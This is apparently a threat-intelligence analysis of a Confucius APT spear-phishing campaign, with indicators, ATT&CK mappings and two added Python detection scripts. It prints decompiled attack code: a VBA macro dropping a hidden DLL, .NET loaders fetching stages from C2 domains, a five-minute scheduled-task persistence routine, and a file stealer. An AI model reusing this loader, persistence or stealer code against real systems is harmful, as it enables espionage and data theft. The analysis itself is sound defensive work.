Confucius, an Indian state-sponsored APT group, continues to target defense and government organizations in South Asia, especially Pakistan. The primary purpose of the threat actor appears to be conducting espionage campaigns and stealing information critical to the operations of the targeted institutions.
In August 2021, the release of Amnesty International’s advisory on the Pegasus spyware built by Israel’s NSO Group caused major unrest among the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began luring such individuals with a two-part email: the first email was a simple informational message about defending against Pegasus, and the second email carried an encrypted document (with the document’s password mentioned in the same email). Technical analysis of the document and of the entire attack chain points to a well-thought-out espionage campaign, a first for Confucius.
In late September 2021, the same campaign was re-run; the only changes we observed were the domains used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:
Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:
Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.
Using the Document_Open method, the macro executes two functions; one to write the binary to disk (eventually loading it) and the second to update the caption of an image embedded within the document. The function MyColor takes in the value of the Comments property of the active document, opens the handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.
```vb
Sub Mycolor()
    Dim prop As DocumentProperty
    ' Read the "Comments" built-in document property, which carries the encoded payload
    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            s = prop.Value
        End If
    Next
    ' Decode the property value and write it to %TMP%\skfk.txt
    fnum = FreeFile
    FName = Environ("TMP") & "\skfk.txt"
    Open FName For Binary As #fnum
    Put #fnum, , abc(CStr(s))
    Close #fnum
    ' Load the dropped .NET assembly through PowerShell's Reflection API and call sadkj()
    fr = "'" & Environ("TMP") & "\skfk.txt" & "'"
    Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"
    CreateObject("WScript.Shell").Run Result, 0, True
End Sub
```
Snippet 1: VBA Macros Embedded Inside Lure
Once written, the binary is loaded into memory using PowerShell’s access to the .NET Reflection API (more specifically, the LoadFile method of the Assembly class). LoadFile takes a single parameter, the path of the .NET assembly. An object of Class1 is then instantiated and its sadkj procedure is called.
Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.
```csharp
public void sadkj()
{
    // Path of the assembly the macro dropped into %TMP%
    string str = Path.GetTempPath() + "skfk.txt";
    // Spawn a hidden PowerShell that reloads this same assembly and calls sdlfghjgks()
    new Process
    {
        StartInfo =
        {
            FileName = "powershell.exe",
            Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()",
            WindowStyle = ProcessWindowStyle.Hidden
        }
    }.Start();
    Environment.Exit(0);
}
```
Snippet 2: .NET Loader
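As an added defender-side example (not code from the original post or from the actor’s tooling), the following Python script pulls the Comments built-in property out of an Office Open XML package, where Word stores it as dc:description in docProps/core.xml, and flags documents whose Comments field is an oversized blob that decodes to a PE image. The decoding step (hex, then base64) is an assumption, since the page does not disclose the macro’s abc() routine; the two packages it inspects are constructed samples.

```python
import base64, binascii, io, re, zipfile
import xml.etree.ElementTree as ET

DC_NS = "{http://purl.org/dc/elements/1.1/}"


def read_comments_property(doc_bytes: bytes) -> str:
    """Return the Comments property: Word keeps it as dc:description in docProps/core.xml."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return ""
        root = ET.fromstring(zf.read("docProps/core.xml"))
    node = root.find(DC_NS + "description")
    return (node.text or "") if node is not None else ""


def decode_blob(text: str) -> bytes:
    """Try hex, then base64 (assumption: the macro's abc() decoder is not shown on the page)."""
    compact = re.sub(r"\s+", "", text)
    if compact and len(compact) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", compact):
        return binascii.unhexlify(compact)
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return b""


def triage(doc_bytes: bytes, size_threshold: int = 4096) -> dict:
    """Flag a document whose Comments field is both oversized and decodes to a PE image (MZ header)."""
    comments = read_comments_property(doc_bytes)
    is_pe = decode_blob(comments)[:2] == b"MZ"
    return {"comments_length": len(comments), "decodes_to_pe": is_pe,
            "suspicious": is_pe and len(comments) > size_threshold}


def build_sample(comments: str) -> bytes:
    """Build a minimal OOXML package holding only docProps/core.xml (constructed test input)."""
    core = ('<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
            'xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:description>'
            + comments + "</dc:description></cp:coreProperties>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()


# Constructed samples: an ordinary comment, and a fake DOS-header blob standing in for a smuggled DLL.
BENIGN_DOC = build_sample("Reviewed by finance, v2")
SMUGGLED_DOC = build_sample(base64.b64encode(b"MZ\x90\x00" + b"\x00" * 6000).decode())

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_DOC), ("smuggled", SMUGGLED_DOC)):
        print(name, triage(doc))
```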
This function is interesting because it references a URL on the C2 infrastructure from which it acquires a file (what looks like another DLL masquerading as a .TXT file). In summary, the function downloads the .TXT file from a URL on the domain inshaaldom.xyz, converts the ASCII payload to binary via the moon function and loads it as an assembly, enumerates the types in that assembly, instantiates them, and dynamically invokes the ndmsbfl function of the newly acquired assembly.
```csharp
public void sdlfghjgks()
{
    WebClient webClient = new WebClient();
    string uriString = "https://inshaaldom.xyz/SowpnTdb.txt";
    try
    {
        // Download the ASCII-encoded payload, decode it with moon() and load it as an assembly
        string sweiorut = webClient.DownloadString(new Uri(uriString));
        Type[] types = Assembly.Load(this.moon(sweiorut)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
            object arg = Activator.CreateInstance(types[i]);
            // Dynamic (late-bound) call of ndmsbfl() on each instantiated type
            if (Class1.<>o__3.<>p__0 == null)
            {
                Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(
                    Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(
                        CSharpBinderFlags.ResultDiscarded, "ndmsbfl", null, typeof(Class1),
                        new CSharpArgumentInfo[] { CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null) }));
            }
            ...
}
```
Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler
Static analysis of SowpnTdb.txt (a DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\ILMerge\SowpnTdb.pdb (seen in one of the intrusions from the campaign) indicated that several projects were in the pipeline to continue the attack campaign. Several metadata fields of the binary pointed towards it being a Task Scheduler, likely acquired from GitHub. Reconnaissance on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows, which was a direct match for the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We have previously identified similar patterns of open-source tool (OST) usage by their (potential) sister group, SideWinder.
Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.
```csharp
public void ndmsbfl()
{
    // Drop the next-stage DLL (masquerading as .txt) under C:\ProgramData
    new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt");
    new TaskService();
    // Repeat every five minutes, indefinitely
    TimeTrigger trigger = new TimeTrigger
    {
        Repetition = new RepetitionPattern(TimeSpan.FromMinutes(5.0), TimeSpan.FromDays(0.0), false)
    };
    string path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
    // Hidden PowerShell reflectively loads the dropped DLL and calls Nasuyd()
    string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" ";
    TaskService.Instance.AddTask("Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);
}
```
Snippet 4: .NET Task Scheduler
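An added detection example (not code from the original post): given the Task Scheduler XML of a newly created task (for instance the TaskContent of Security event 4698), score it for the traits of the Systemcheck task above, namely a repetition interval of a few minutes, a hidden PowerShell window, a reflective LoadFile, and an assembly read from a non-.dll file under ProgramData. The two task definitions below are constructed samples; the threshold of three traits is an assumption.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"


def interval_minutes(iso_duration: str) -> float:
    """Task Scheduler expresses repetition as ISO 8601 durations (PT5M, PT1H30M, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso_duration or "")
    if not m:
        return float("inf")
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def score_task(task_xml: str) -> dict:
    """Collect the traits that, together, match the Systemcheck persistence pattern."""
    root = ET.fromstring(task_xml)
    findings = []
    for trig in root.iter(NS + "TimeTrigger"):
        iv = trig.findtext(f"{NS}Repetition/{NS}Interval") or ""
        if interval_minutes(iv) <= 10:
            findings.append(f"tight repetition interval {iv}")
    for ex in root.iter(NS + "Exec"):
        cmd = (ex.findtext(NS + "Command") or "").lower()
        args = ex.findtext(NS + "Arguments") or ""
        if "powershell" not in cmd:
            continue
        if re.search(r"-w(indowstyle)?\s+hidden", args, re.I):
            findings.append("hidden PowerShell window")
        if re.search(r"\[Reflection\.Assembly\]::Load", args, re.I):
            findings.append("reflective assembly load")
        for path in re.findall(r"[A-Za-z]:\\[^\"'\s;)]+", args):
            if not path.lower().endswith(".dll") and re.search(r"ProgramData|\\Temp\\|AppData", path, re.I):
                findings.append(f"assembly loaded from non-.dll file: {path}")
    return {"suspicious": len(findings) >= 3, "findings": findings}


# Constructed task XML mirroring the task created by ndmsbfl(), and a benign scheduled script for contrast.
MALICIOUS_TASK = r'''<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT5M</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
  <Arguments>-windowstyle hidden -C $rk = """C:\ProgramData\jksdfhk.txt""";[Reflection.Assembly]::LoadFile($rk);$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()</Arguments>
  </Exec></Actions></Task>'''
BENIGN_TASK = r'''<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2021-10-01T02:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
  <Arguments>-ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1</Arguments></Exec></Actions></Task>'''

if __name__ == "__main__":
    print(score_task(MALICIOUS_TASK))
    print(score_task(BENIGN_TASK))
```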
The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:
```csharp
public void Nasuyd()
{
    WebClient webClient = new WebClient();
    string uriString = "https://parinari.xyz/Rwlksdnasjd.txt";
    try
    {
        // Download the ASCII-encoded stealer, decode it with Houn() and load it as an assembly
        string st = webClient.DownloadString(new Uri(uriString));
        Type[] types = Assembly.Load(this.Houn(st)).GetTypes();
        for (int i = 0; i < types.Length; i++)
        {
            object arg = Activator.CreateInstance(types[i]);
            // Dynamic (late-bound) call of sdsdjkfhds() on each instantiated type
            if (Class1.<>o__1.<>p__0 == null)
            {
                Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(
                    Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(
                        CSharpBinderFlags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1),
                        new CSharpArgumentInfo[] { CSharpArgumentInfo.Create(CSharpArgumentInfoFlags.None, null) }));
            }
            ...
}
```
Snippet 4: Final .NET loader
Continuing the analysis with the last invoked function, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside it confirm that it is an uploader. A snippet of the function is listed below:
```csharp
public void sdsdjkfhds()
{
    string userName = Environment.UserName;
    List<string> pfhl = new List<string>();
    string pattern = "*";
    // Gpufh() fetches the list of MD5 hashes already delivered to the C2 server
    pfhl = this.Gpufh();
    "C:\\\\Users\\\\" + userName;
    // Register the victim as <MachineName>__<UserName> with the server
    string tdn = Environment.MachineName + "__" + userName;
    this.CUD(tdn, 0);
    // Sweep the common user folders of every profile under C:\Users
    foreach (string text in Directory.GetDirectories("C:\\Users\\"))
    {
        if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public")
        {
            this.GF(text + "\\Documents\\", pattern, "Documents", pfhl);
            this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl);
            this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl);
            this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl);
        }
    }
    // Then the root of every drive other than C:
    DriveInfo[] drives = DriveInfo.GetDrives();
    char[] trimChars = new char[] { ':', '\\' };
    foreach (DriveInfo driveInfo in drives)
    {
        if (driveInfo.Name != "C:\\")
        {
            this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl);
        }
    }
    Environment.Exit(0);
}
```
Snippet 5: Stealer and Uploader
```csharp
private void GF(string path, string pattern, string ufn, List<string> pfhl)
{
    ...
    try
    {
        list.AddRange(Directory.GetFiles(path, pattern, SearchOption.TopDirectoryOnly));
        foreach (string text in list)
        {
            ...
            // Extension allow-list: text, PDF, images, Office and OpenDocument files
            if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" ||
                a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" ||
                a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" ||
                a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" ||
                a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" ||
                a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG")
            {
                list2.Add(text);
            }
        }
        ...
        foreach (string text3 in list2)
        {
            if (!(text3 == ""))
            {
                // MD5 of the file contents, used to skip files already exfiltrated
                string item;
                using (MD5 md = MD5.Create())
                {
                    using (FileStream fileStream = File.OpenRead(text3))
                    {
                        item = BitConverter.ToString(md.ComputeHash(fileStream)).Replace("-", "");
                    }
                }
                if (!pfhl.Contains(item))
                {
                    list3.Add(text3);
                    list4.Add(item);
                }
            }
        }
    }
    if (list3.Count != 0)
    {
        this.CUD(text2, 1);
        ...
    }
    ...
}
```
Snippet 6: Capabilities of the Stealer
Although the payload acquisition domain encrypts its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz, uses plain-text HTTP to send and receive data from the C2 server. As in earlier Confucius campaigns, the server-side pages are written in PHP (with random URIs and parameter names used to collect the username and machine name). Since the task is scheduled to run every five minutes, the uploader runs the same routine over and over, collecting files and folders from the system, until it is terminated.
The following Indicators of Compromise were discovered during the course of our intrusion analysis:
File Name | Type | Hash
---|---|---
Ticket00073146.docm | MD5 | a91be9529d06cd4a6c06a01b5c595630
Ticket00073146.docm | SHA1 | 814367a04163802d5e124e599772c6a3ba681a78
Ticket00073146.docm | SHA256 | 034cfe57d26cfea4139cf7bb387b9ba8f8705e44d3868e5edc36af0f7a8aa5bf
Tysdf.dll (skfk.txt) | MD5 | ae3e8679df2976d31da858fd7af67185
Tysdf.dll (skfk.txt) | SHA1 | 4c6c04af547b7df04e3bdb3f69e812a30b200016
Tysdf.dll (skfk.txt) | SHA256 | ea7a951dbd93d5ef6ca535820499da29753331e1e8a38c6fef9398a57a679ef0
Msdjkfh.dll (jksdfhk.txt) | MD5 | 5397cbaf89ff40a8b08004ac5164c8a0
Msdjkfh.dll (jksdfhk.txt) | SHA1 | 17f1e33763cb6e5ae6b39f3f28bc695ac597ce7b
Msdjkfh.dll (jksdfhk.txt) | SHA256 | bf50438e10e8ed3eaa7949440a6ac4bdc55305aa2bfe75fa1997feaf0cbc9d50
Rwlksdnasjd.dll (Stealer) | MD5 | 457101ea5c30c53f9381d7e9aa6432a4
Rwlksdnasjd.dll (Stealer) | SHA1 | e554c0ef069fe5a49919bea560003cfccd69f858
Rwlksdnasjd.dll (Stealer) | SHA256 | 43698d70087aa875c4384b59cacd8eff56bd0bff3be20e69b98613ec5184b41f
SowpnTdb.txt (Scheduler) | MD5 | 4461412acfc3988974355d4c1601d3f6
SowpnTdb.txt (Scheduler) | SHA1 | 33596fbe26e556bb2610739f070b66a2cf532eda
SowpnTdb.txt (Scheduler) | SHA256 | 63ca532a13ff909b4b7f72b9a094fa3fc59713984f645664c95a66f14be5f96a
File Path | Description
---|---
%Temp%\skfk.txt | .NET DLL dropped by the Word document; used to load the next stage into memory
C:\ProgramData\jksdfhk.txt | .NET DLL dropped by SowpnTdb.dll; used to load the next stage into memory
Task Name | Task Occurrence
---|---
Systemcheck | Every five minutes
Domain Name | Protocol | Usage | IPv4 Address
---|---|---|---
thakithaiya.xyz | HTTP | Exfiltration | 80.209.238.155
pirnaram.xyz | HTTP | Exfiltration | 34.98.99.30, 62.77.153.51
inshaaldom.xyz | HTTPS | Payload Acquisition | 104.21.10.162, 172.67.146.1
parinari.xyz | HTTPS | Payload Acquisition | 34.98.99.30, 104.21.86.125, 172.67.219.211
Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.
The following tactics, techniques, and procedures are actively used by Confucius in their intrusions:
ID | Name | Description
---|---|---
T1598 | Gather Victim Identity Information | Confucius extensively gathers the victim’s identifying information to target them via effective lures
T1583 | Acquire Infrastructure | Confucius acquires new infrastructure (discussed in the next techniques) a month before each new campaign
T1583.001 | Acquire Infrastructure: Domains | Confucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to exfiltrate data to
T1583.004 | Acquire Infrastructure: Server | Confucius acquires virtual private servers to acquire payloads from and exfiltrate data to during the Command and Control phase
T1566 | Phishing/Spearphishing Attachment | Confucius heavily relies on spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted, with the password mentioned in the email’s content) by utilizing decoy documents including payrolls, Pegasus (defenses against it), and others
T1053.005 | Scheduled Task/Job: Scheduled Task | Confucius schedules a task on the compromised system to re-execute the malicious payload (every five minutes)
T1036 | Masquerading | Dynamic-link library (.DLL) files used by Confucius to load the payload of subsequent stages masquerade as .TXT (plain-text) files on the filesystem
T1083 | File and Directory Discovery | The final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and exfiltrates the identified files to the C2 server
T1082 | System Information Discovery | The final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration, and later downloads hash lists for comparison
T1059.001 | Command and Scripting Interpreter: PowerShell | Confucius heavily relies on the Reflection API accessible from PowerShell to load/execute their DLLs in memory, leaving a minimal footprint on the compromised system’s disk
T1005 | Data from Local System | Confucius collects data such as files and folders from the compromised system in an automated fashion to exfiltrate to their server
T1071.001 | Application Layer Protocol: Web Protocols | Confucius serves its command and control server using the web protocols HTTP and HTTPS
T1573.002 | Encrypted Channel: Asymmetric Cryptography | Confucius uses asymmetric cryptography to encrypt its communication over web protocols and communicate with the C2 server
T1041 | Exfiltration over C2 Channel | Confucius exfiltrates data collected from the compromised system over the C2 channel
T1029 | Scheduled Transfer | The scheduled job also implements a schedule to transfer/exfiltrate files from the compromised system and to acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server
While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius typically buys its C2 domains from the registrar GoDaddy, using various US-based registrant addresses. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the August 2021 campaign, parinari.xyz, were both registered from Chandigarh, India. We consider this an operational mistake by the operators behind Confucius that reveals their origin.
Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius
The techniques selected by Confucius are not very sophisticated at the moment, and the campaign shows some operational security failures; however, analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.
Previous campaigns by Confucius used techniques like template injection in spear-phishing documents; the current campaign, however, uses macros together with a PE embedded in the Comments property of the document, presented as a picture caption. These minor changes in technique suggest the group is actively looking to switch its tradecraft to avoid detections based on named rulesets.